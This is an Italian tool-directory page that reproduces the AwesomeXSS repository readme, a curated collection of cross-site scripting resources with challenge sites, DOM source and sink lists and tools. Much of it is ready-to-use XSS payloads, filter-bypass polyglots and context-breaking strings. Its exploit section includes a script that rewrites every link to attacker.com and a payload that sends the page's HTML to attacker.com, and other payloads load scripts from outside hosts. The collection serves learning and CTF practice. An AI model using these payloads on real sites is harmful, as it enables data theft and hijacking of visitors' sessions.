Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
AwesomeXSS — Fantastici materiali XSS | Kitploit
Strumenti/GitHubGitHub/s0md3v/awesomexss
Generazione di PayloadBypass WAFSicurezza WebCTFPaper e RicercaApprendimento e FormazioneRisorse CuratePercorsi e CorsiLab e Pratica
GitHubs0md3v/awesomexss

AwesomeXSS

Fantastici materiali XSS

5.1k782331 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
Condividi

AwesomeXSS

Questo repository è una raccolta di risorse XSS fantastiche. I contributi sono benvenuti e devono essere inviati tramite un issue.

Contenuti fantastici

  • Sfide
  • Letture e Presentazioni
  • Strumenti
  • Mappe mentali
  • DOM XSS
  • Payload
  • Polyglot
  • Tag e gestori di eventi
  • Rottura del contesto
    • Contesto HTML
    • Contesto attributo
    • Contesto JavaScript
  • Varianti di confirm
  • Exploit
  • Sondaggio
  • Bypass
  • Codifica
  • Suggerimenti e trucchi

Sfide fantastiche

  • prompt.ml
  • alf.nu/alert1
  • xss-game.appspot.com
  • polyglot.innerht.ml
  • sudo.co.il/xss
  • root-me.org
  • chefsecure.com
  • wechall.net
  • codelatte.id/labs/xss

Letture e presentazioni fantastiche

  • Bypass dei meccanismi di rilevamento XSS
  • XSS su Facebook tramite tipo di contenuto PNG
  • Come ho incontrato la tua ragazza
  • Come trovare 1.352 vulnerabilità XSS di plugin WordPress in un'ora
  • Blind XSS
  • Copy Pest

Strumenti fantastici

  • XSStrike
  • BeEF
  • JShell

Mappe mentali XSS fantastiche

Una bellissima mappa mentale XSS di Jack Masa, qui

DOM XSS fantastici

  • Il tuo input finisce in un sink? Vulnerabile
  • No? Non vulnerabile

Fonte: Un input che può essere controllato da una fonte esterna (non attendibile).

document.URL
document.documentURI
document.URLUnencoded (IE 5.5 o successivi solo)
document.baseURI
location
location.href
location.search
location.hash
location.pathname
document.cookie
document.referrer
window.name
history.pushState()
history.replaceState()
localStorage
sessionStorage

Sink: Un metodo potenzialmente pericoloso che potrebbe portare a una vulnerabilità. In questo caso un XSS basato su DOM.

eval
Function
setTimeout
setInterval
setImmediate
execScript
crypto.generateCRMFRequest
ScriptElement.src
ScriptElement.text
ScriptElement.textContent
ScriptElement.innerText
anyTag.onEventName
document.write
document.writeln
anyElement.innerHTML
Range.createContextualFragment
window.location
document.location

Questa lista completa di sink e fonti è presa da domxsswiki.

Payload fantastici

<A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
<d3"<"/onclick="1>[confirm``]"<">z
<d3/onmouseenter=[2].find(confirm)>z
<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<a href="https://github.com/s0md3v/awesomexss/blob/master/javascript%26colon%3Balert%281%29">click
<a href=javas&#99;ript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--` --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
x
<svg onload=write()>

Polyglot fantastici

Ecco un polyglot XSS che ho creato e che può uscire da oltre 20 contesti:

%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`

Spiegazione di come funziona, qui

Tag e gestori di eventi fantastici

  • 105 gestori di eventi con descrizione
  • 200 gestori di eventi senza descrizione

Alcuni gestori di eventi meno rilevati

ontoggle
onauxclick
ondblclick
oncontextmenu
onmouseleave
ontouchcancel

Alcuni tag HTML che userai

img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video

Rottura del contesto fantastica

Contesto HTML

Caso: <tag>Hai cercato $input. </tag>

<svg onload=alert()>
</tag><svg onload=alert()>

Contesto attributo

Caso: <tag attribute="$input">

"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()

Contesto JavaScript

Caso: <script> var new something = '$input'; </script>

'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>

Varianti di confirm fantastiche

Sì, confirm perché alert è troppo mainstream.

confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)

Exploit fantastici

Sostituisci tutti i link
Array.from(document.getElementsByTagName("a")).forEach(function(i) {
  i.href = "https://attacker.com";
});
Ladro di codice sorgente
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">

Sondaggio fantastico

Se nulla di questo funziona, dai un'occhiata alla sezione Bypass fantastici

Scarica lo strumento